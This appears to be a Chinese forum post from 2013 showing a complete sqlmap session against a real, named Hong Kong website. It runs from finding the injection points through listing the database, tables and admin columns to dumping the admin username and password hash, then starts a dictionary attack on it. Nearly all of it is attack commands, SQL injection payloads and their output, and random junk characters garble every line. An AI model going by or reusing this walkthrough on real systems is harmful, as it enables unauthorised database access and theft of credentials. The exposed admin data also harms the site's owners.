D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 W0 G# B( T* f* l5 B) gms "Mysql" --current-user /* 注解:获取当前用户名称- Z& t2 ]% J2 D: N2 u/ a: n0 X$ E* g
sqlmap/0.9 - automatic SQL injection and database takeover tool
: C; W- p( m! q4 C/ A, u( R http://sqlmap.sourceforge.net starting at: 16:53:54
% f- R6 A; r( l% p+ x7 I$ w! S[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ u) |* W. E/ \% V
session file
& m0 q* y- n( s[16:53:54] [INFO] resuming injection data from session file& o7 Y/ t% V+ }# D- F
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. |8 }) d8 ]% F
[16:53:54] [INFO] testing connection to the target url, V- t4 W" t1 k" \: \
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
) G) n- A* k, V9 e0 L# ksts:# s8 U- z( M7 D5 I9 o
---5 \7 n: z9 ]/ G+ ^9 i
Place: GET
c# |6 \# K; x3 zParameter: id; d- C6 i( x: [/ w9 d. ?' k
Type: boolean-based blind) J3 M/ e7 n! `
Title: AND boolean-based blind - WHERE or HAVING clause
6 Z* ^ H) T+ a9 N, B9 P$ Y9 e Payload: id=276 AND 799=799
) x$ ?& D- e3 L, Y& A: o3 ?- x Type: error-based
4 a; V, {' u4 @2 T. E* h Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 D% l# [2 t {& I0 Z/ c# G1 \ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 X# x! O# G- c. F! h( [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 ~/ T5 j7 S: L4 K),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 z( }- o6 ^& N) \: ^
Type: UNION query- a, M1 x* z, t, `0 l/ p2 J* b
Title: MySQL UNION query (NULL) - 1 to 10 columns& c0 O J% a# n1 W$ Q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 n, e& Y {9 ?4 [5 W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' k5 n! Z( V% ~ o
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* A6 t! M6 ^" a" }
Type: AND/OR time-based blind
& A3 z1 V! p- C/ _5 s7 I Y Title: MySQL > 5.0.11 AND time-based blind8 t7 N. W0 w2 H7 l l3 _6 j
Payload: id=276 AND SLEEP(5)- `" _( T" I1 C2 d3 |4 ~& Q
---* Q$ t, \3 _- y: b6 b* s7 @8 g1 T
[16:53:55] [INFO] the back-end DBMS is MySQL( j1 j% x7 X. U, M% H9 O
web server operating system: Windows
f0 Y1 ~2 z2 y7 K6 {% V- o5 eweb application technology: Apache 2.2.11, PHP 5.3.0
! m/ x/ R4 h+ `7 m6 h" v: i Q) mback-end DBMS: MySQL 5.0' p3 b$ I4 f3 n# p5 M6 X
[16:53:55] [INFO] fetching current user% u2 h4 T2 s+ p P
current user: 'root@localhost' , Z/ r% U( G( p/ d; H3 O
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
' W* N; y4 Q# T5 C6 m4 ~6 I1 mtput\www.wepost.com.hk' shutting down at: 16:53:586 N( X4 p" [) j, X3 J
5 [9 B, K4 l: U3 k- LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 P4 s6 k. a! ` t8 v; a& ?8 I
ms "Mysql" --current-db /*当前数据库( n6 b- ~- h4 D- A8 v7 \# k# C
sqlmap/0.9 - automatic SQL injection and database takeover tool1 J m' m- [& a1 `" g9 ~
http://sqlmap.sourceforge.net starting at: 16:54:16/ i4 _7 h/ }) Y6 ]" {5 I
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as P" b X9 M. q( l
session file: w9 g4 F1 a# u; L5 O6 ~
[16:54:16] [INFO] resuming injection data from session file8 a% R1 E3 G# m' a M# q
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file, ]8 L- M# h7 u/ l
[16:54:16] [INFO] testing connection to the target url
, @7 x" |7 W! ~2 i3 \sqlmap identified the following injection points with a total of 0 HTTP(s) reque; Y% ?# [& |# F
sts:
$ c$ ?/ c8 W- i: }---
/ }3 M, e$ w) g+ ^' r9 d! |Place: GET
2 [" B ]; q0 tParameter: id
7 r3 o% M: P" i5 x4 m Type: boolean-based blind
. K; N; `' `2 `% @9 X; e O( A Title: AND boolean-based blind - WHERE or HAVING clause
. i' x J) L0 M% u9 V7 q& p7 G# f; L Payload: id=276 AND 799=799
2 ]' B1 q" b9 Z( r" {+ Z2 U Type: error-based/ u8 R% |+ ?& k, R$ U" [- n
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 A7 I' ~3 p d6 F1 S) k Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. [, B9 K1 E6 l120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 g! Y! i/ J6 A# J),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 W/ @% v, K: ?% D, k
Type: UNION query5 D' }) v% ~+ Y
Title: MySQL UNION query (NULL) - 1 to 10 columns
& f4 x3 C8 o1 k7 j% o$ r1 A Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 h: h( [1 _6 v4 l3 R: l6 |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. q W* }" f# Z! t( D1 ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 e+ W- u, a1 A Type: AND/OR time-based blind( Y* r) ?5 l- o9 ]1 \# z. _( y6 B
Title: MySQL > 5.0.11 AND time-based blind& ? t& u- s6 M* Q
Payload: id=276 AND SLEEP(5)
0 t% G1 u1 a& J9 `---
# ^9 {$ d/ W! U/ m& Z6 p[16:54:17] [INFO] the back-end DBMS is MySQL% a, e% ` r4 g* J
web server operating system: Windows
( d6 j- I+ ~: M6 ?9 r& Nweb application technology: Apache 2.2.11, PHP 5.3.0; r# _0 d4 [5 ]" i
back-end DBMS: MySQL 5.0
( g) Z$ W3 O: X/ g" O' V7 C[16:54:17] [INFO] fetching current database* I& F" ~# R b0 a* W: p7 m
current database: 'wepost'
; A+ Y* m. R5 ~: |4 ~2 u& S, [# C[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* k7 }! R# z% k$ r( J) I7 Z. V
tput\www.wepost.com.hk' shutting down at: 16:54:186 l2 F* Y( }1 n" G
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
9 W" o" }# c% w0 D' ~ Q! y! Ams "Mysql" --tables -D "wepost" /*获取当前数据库的表名
3 a4 p8 w3 Z! Y6 ~0 Y sqlmap/0.9 - automatic SQL injection and database takeover tool' Q! o1 i# q6 T5 i1 {
http://sqlmap.sourceforge.net starting at: 16:55:25+ X+ D: H# U: E8 k: B6 z. L
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" g9 k0 q: V$ p+ [3 e
session file
+ Z) S! h5 l( e% P9 g; k8 `7 ]+ y[16:55:25] [INFO] resuming injection data from session file
- V& ^# w8 b7 D7 X; a4 f( ^& ?[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* b% g5 Y6 [7 E[16:55:25] [INFO] testing connection to the target url
, B" l9 q4 ]9 O) {sqlmap identified the following injection points with a total of 0 HTTP(s) reque( v0 U* q7 f) s/ Q) v
sts:
8 X+ z4 W4 S4 K& i---
( s h# i8 G" }2 @Place: GET
' R" h2 E% v/ o8 {: f8 d9 M" }' ?7 V; VParameter: id
2 p, g1 n; ]9 f. J H2 J Type: boolean-based blind; K$ k5 O2 M: f+ L
Title: AND boolean-based blind - WHERE or HAVING clause; m4 M+ @# `8 T7 c$ N
Payload: id=276 AND 799=7993 |3 ?. L( z0 _/ c6 f# Y% h1 I
Type: error-based
" l& ]+ N# H+ w" I, A9 R Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) f) @& F7 t, `; W Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, \6 b/ y- Q# }( e
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; j- D; _: H, _/ A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 `$ j' h! T# j" C( Y. s
Type: UNION query* f, b3 v! J* ^4 C2 F8 @
Title: MySQL UNION query (NULL) - 1 to 10 columns( K% }' V1 f5 i; x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR O2 O. _$ ~2 |6 }4 Q) {7 C
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 F0 H$ R2 P. ]# E. mCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% @5 e9 S, R- S9 r Type: AND/OR time-based blind6 q" C7 O+ J/ M
Title: MySQL > 5.0.11 AND time-based blind
7 h j& O u) Q' ~, ^- I" j Payload: id=276 AND SLEEP(5)
2 s( d( A& l" d: u5 P3 R7 U---
\: E$ i- z9 k5 W; j1 Y# g. T* `5 l: [[16:55:26] [INFO] the back-end DBMS is MySQL9 ~2 x' h2 V) [ i
web server operating system: Windows L8 U4 [* i, t. Q. L# t
web application technology: Apache 2.2.11, PHP 5.3.0
1 d }! k1 W5 D7 p, i0 Uback-end DBMS: MySQL 5.0
/ S( a7 T4 R j* t[16:55:26] [INFO] fetching tables for database 'wepost'
' x |" n e* X/ U1 M[16:55:27] [INFO] the SQL query used returns 6 entries
- m5 q2 ~) j# f) }- I$ W k& c) D/ TDatabase: wepost$ Y+ H! e- D) ]8 l2 \! G
[6 tables]( Q8 ], X9 a4 o
+-------------+4 I' ~( I! a, Z$ k M
| admin |
0 O( A2 ~+ A" g. z5 I| article |
7 F7 ?0 q5 o) N6 k* q$ `( y2 T| contributor |
' l. k9 i+ k$ q) r| idea |) O* K0 J7 C0 t$ \
| image |
- S6 H% M; M0 Q4 j| issue |
" F2 I v. l* h9 B5 ~7 B4 A# b2 ]3 D+-------------+
6 m$ l# v( i8 k+ G _/ f[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' L& l+ X) i( D/ F* i; Y
tput\www.wepost.com.hk' shutting down at: 16:55:33
4 U% {' Y/ G* A0 ?, u' v6 F8 G, |) Y/ T7 @! m# d- q, p; i1 y4 ~
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# }' T4 _0 C! j6 O4 nms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
2 a- k, z5 x& O9 X6 I: Z% D sqlmap/0.9 - automatic SQL injection and database takeover tool7 x/ j$ w) J" P! B# `
http://sqlmap.sourceforge.net starting at: 16:56:069 @' J& |; ~9 e
sqlmap identified the following injection points with a total of 0 HTTP(s) reque: o; h% q! Z4 y/ i: J4 |5 p. e
sts:" _: s) J$ r8 a4 p
---
$ B: s; n8 m) w8 J( w3 y! fPlace: GET
3 _& c, {) I0 k2 YParameter: id
2 R8 r2 Y3 y2 k/ ]9 `) d4 |2 F Type: boolean-based blind
! b# t9 [0 B8 \. i Title: AND boolean-based blind - WHERE or HAVING clause1 U6 w5 s" o; T5 B
Payload: id=276 AND 799=799$ [* i; m0 |" D& _% x$ E
Type: error-based
1 B# i. h+ [3 }+ G0 t* x/ z Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause B% X' P) e E
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" V! O/ X* k( C! Q* o& M120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' |. `# A$ a; K& u: s* h( ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! |2 P5 O. S h Type: UNION query9 v9 o: A) Y, V$ `; n
Title: MySQL UNION query (NULL) - 1 to 10 columns
5 b- P8 L3 v) b+ s4 L+ Z Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) D5 K3 w4 m. `; R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, T2 T* x- |' }$ o
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 _& D( c" h' R' {8 O+ }4 O7 {3 U
Type: AND/OR time-based blind
: [3 a+ r3 E2 i' |. r% k Title: MySQL > 5.0.11 AND time-based blind
# Q- } C# n6 x( B. V6 j0 z Payload: id=276 AND SLEEP(5)
+ I# g, C+ F. {" I---
1 t. i# I& M( w5 k) J7 lweb server operating system: Windows1 p0 K) c4 d7 B- X f4 g7 ], K' m
web application technology: Apache 2.2.11, PHP 5.3.0
3 m1 l3 R! `, }: aback-end DBMS: MySQL 5.06 y9 Q4 A6 H9 z: {
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se: B! _) {& p+ ^. X$ Q y+ k r
ssion': wepost, wepost5 Y6 m9 t7 I9 {+ ?
Database: wepost
+ |+ q f7 i7 Q5 t9 f0 ^" y' U0 k+ ^Table: admin
3 }! Q8 n1 F. G) f[4 columns]
* f, V8 K4 C( S3 a D& N+----------+-------------+ w0 ~. Q7 F" O$ D% A% y9 ^
| Column | Type |+ g# G6 h) k6 c- m& V2 P
+----------+-------------+0 ]5 M: |- n, X6 P9 H; T8 q
| id | int(11) |
4 W: n# D9 s5 R* ~3 V2 k V| password | varchar(32) |6 \& h2 p% L. X7 O4 q$ _1 A! d
| type | varchar(10) |
' S3 {# u6 y- Y' R: @% U" @1 }| userid | varchar(20) |
% x; j2 s0 M) ]. ?/ S, }7 ~+----------+-------------+0 ~0 v9 E/ ?8 @" o2 E$ `9 v6 S9 L0 s8 H
shutting down at: 16:56:192 w1 M4 {* @0 Y0 B, g0 j3 w
5 G0 O# D9 D7 M2 p, P, I
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) \" a8 ^2 x' h2 M
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容4 A) e' q& |$ X* l$ l, U M
sqlmap/0.9 - automatic SQL injection and database takeover tool
; w( h; q5 \8 Z! R http://sqlmap.sourceforge.net starting at: 16:57:14* O) D" G* Z h" J* D. @; Y8 o
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 }" x2 V# h1 V# B1 c# \" ists:
2 S9 n" ^6 v" F% y: c---
4 `( w8 J- {3 QPlace: GET
7 S2 n; C- L" e: [4 oParameter: id
{& Q! p4 u8 Z2 C, s7 {! \ Type: boolean-based blind
) F! J2 U& q6 e+ D* e: E7 V+ y( | Title: AND boolean-based blind - WHERE or HAVING clause* f4 O' V, e: o) M9 [: t9 u! a9 c
Payload: id=276 AND 799=7992 |0 p0 c- S5 [) Y2 N& h( E
Type: error-based; Z7 _8 q! k0 o" n Y0 ^6 D# B
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
[! A c$ x* P7 ]& I3 F8 [, X' H Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 `% n) z5 ~% T5 K+ z) ?( z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) P. C9 v4 R6 X, d# g+ E5 \4 q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 X( W: X, R$ P4 H1 D Type: UNION query
C! d* H! b8 {# X* W4 S* x Title: MySQL UNION query (NULL) - 1 to 10 columns( o6 b+ U# e! W, U
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 ~' z5 L3 I h. m q, K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 c4 [5 y6 D0 |; v: |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, e* R" n! @8 U Type: AND/OR time-based blind
0 B! v+ v/ a/ w Title: MySQL > 5.0.11 AND time-based blind
% p M* t" h1 ^- d3 |* R( k0 m Payload: id=276 AND SLEEP(5)
2 I' g& f# a/ ]& |" P' ^---
5 O9 _& `3 h: |3 f; D/ x/ t- |web server operating system: Windows
) i/ T2 N m# t2 Q. {+ V0 T7 @web application technology: Apache 2.2.11, PHP 5.3.0
6 S" K; \, \% T. o/ hback-end DBMS: MySQL 5.0
; C% t! i [' w6 t ]2 erecognized possible password hash values. do you want to use dictionary attack o
2 E* U6 L* f' w. O0 Nn retrieved table items? [Y/n/q] y
8 s* \3 ?/ e7 M1 ^what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
$ Z; c, M9 M8 I- n& t ?do you want to use common password suffixes? (slow!) [y/N] y C+ ^& a2 A- i* J# F9 Y7 t
Database: wepost
9 j( {0 R8 ^+ e z" [Table: admin. ^, `2 S4 k) L- L2 m7 ^/ w
[1 entry]# j9 u: X% W+ r/ `: C, C+ {
+----------------------------------+------------+
/ @# s* L; Y, M, W+ Y| password | userid |
/ O9 m+ \8 U9 r2 L( H. t8 c1 ~+----------------------------------+------------+
+ h$ G3 ^6 @- E3 u# \| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
6 ^2 H5 u& d5 s7 q0 V. t4 _7 H3 W+----------------------------------+------------+; a8 J8 r" Z8 l
shutting down at: 16:58:14
+ `6 B2 F; }3 e$ a
+ a7 l* H8 n0 vD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对